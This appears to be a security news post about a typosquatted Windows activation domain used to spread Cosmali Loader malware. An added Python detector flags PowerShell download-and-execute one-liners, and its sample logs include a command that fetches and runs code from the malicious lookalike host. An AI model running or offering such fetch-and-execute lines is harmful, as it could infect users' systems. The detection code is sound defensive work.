Fake MAS Windows activation domain utilized to distribute PowerShell malware.
- Dec 28, 2025
- 2 min read

A typosquatted domain mimicking the Microsoft Activation Scripts (MAS) tool was utilized to distribute malicious PowerShell scripts that infect Windows systems with the 'Cosmali Loader'.
BleepingComputer discovered that several MAS users started reporting on Reddit [1, 2] yesterday about receiving pop-up warnings on their systems regarding a Cosmali Loader infection.
You have been infected by malware called 'cosmali loader' because you mistyped 'get.activated.win' as 'get.activate[.]win' while activating Windows in PowerShell
The malware's dashboard is not secure, allowing anyone who views it to access your computer.
Reinstall Windows and avoid repeating the same error in the future.
To verify that your computer is compromised, open Task Manager and look for unusual PowerShell processes.
According to reports, attackers have created a deceptive domain, "get.activate[.]win," which closely mimics the legitimate one found in the official MAS activation instructions, "get.activated.win."
Since the only difference between the two is one character ("d"), attackers rely on users mistyping the domain.
Security researcher RussianPanda determined that the alerts are linked to the open-source Cosmali Loader malware and may be connected to similar pop-up notifications observed by GDATA malware analyst Karsten Hahn.


RussianPanda informed BleepingComputer that Cosmali Loader was used to deploy cryptomining tools and the XWorm remote access trojan (RAT).
While it is unclear who sent the warning messages to users, it is likely that a well-intentioned researcher accessed the malware's control panel and used it to alert victims about the compromise.
MAS is an open-source set of PowerShell scripts that automate the activation of Microsoft Windows and Microsoft Office through HWID activation, KMS emulation, and various bypasses (Ohook, TSforge).
The project is available on GitHub and is actively maintained. However, Microsoft considers it a piracy tool that activates products without a purchased license by using unauthorized methods that bypass its licensing system.
The project's maintainers also cautioned users about the campaign and advised them to verify the commands they enter before executing them.

Users are advised to refrain from running remote code unless they fully understand what it does. Always test in a sandbox environment, and avoid retyping commands by hand, since a single mistyped character can fetch a harmful payload from a typosquatted domain.
Unofficial Windows activators have frequently been abused for malware distribution, so users should be aware of the risks and exercise caution when using these tools.
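The typosquat described above (one missing character) and the advice to verify commands before running them both suggest a simple detection: scan PowerShell script-block logs for download-and-execute one-liners and flag hosts that are within a small edit distance of a known-good host. The script below is an added example written for this article, not code from BleepingComputer or the MAS project; the log lines are constructed, and the regex and the known-good host list are assumptions.

```python
import re
from typing import Dict, List

# Known-good host from the official MAS instructions (taken from the article).
KNOWN_HOSTS = {"get.activated.win"}

# Matches PowerShell "download and run" one-liners such as:
#   irm https://host/path | iex
# Captures the host portion of the URL (assumed pattern, not exhaustive).
ONE_LINER = re.compile(
    r"\b(?:irm|iwr|Invoke-RestMethod|Invoke-WebRequest)\s+(?:-Uri\s+)?['\"]?"
    r"(?:https?://)?([A-Za-z0-9.-]+)[^|]*\|\s*(?:iex|Invoke-Expression)\b",
    re.IGNORECASE,
)

def edit_distance(a: str, b: str) -> int:
    # Levenshtein distance (insert/delete/substitute) via dynamic programming.
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def classify_host(host: str, max_distance: int = 2) -> str:
    # "known" for an exact match, "lookalike of <host>" for a near miss, else "unknown".
    host = host.lower().rstrip(".")
    if host in KNOWN_HOSTS:
        return "known"
    for good in KNOWN_HOSTS:
        if edit_distance(host, good) <= max_distance:
            return f"lookalike of {good}"
    return "unknown"

def scan_script_block_logs(lines: List[str]) -> List[Dict[str, str]]:
    # Returns one finding per line that contains a download-and-execute one-liner.
    findings = []
    for line in lines:
        m = ONE_LINER.search(line)
        if m:
            host = m.group(1)
            findings.append({"host": host, "verdict": classify_host(host), "line": line})
    return findings

# Constructed sample ScriptBlockText entries (Event ID 4104 style), not real telemetry.
SAMPLE_LOGS = [
    "ScriptBlockText: irm https://get.activated.win | iex",
    "ScriptBlockText: irm https://get.activate.win | iex",
    "ScriptBlockText: Get-Process | Where-Object CPU -gt 100",
    "ScriptBlockText: iwr http://cdn.example.invalid/x.ps1 | iex",
]

if __name__ == "__main__":
    for f in scan_script_block_logs(SAMPLE_LOGS):
        print(f"{f['verdict']:<32} {f['host']}")
```

Lookalike verdicts are worth alerting on even when the host never resolved, since the mistyped command itself is the indicator.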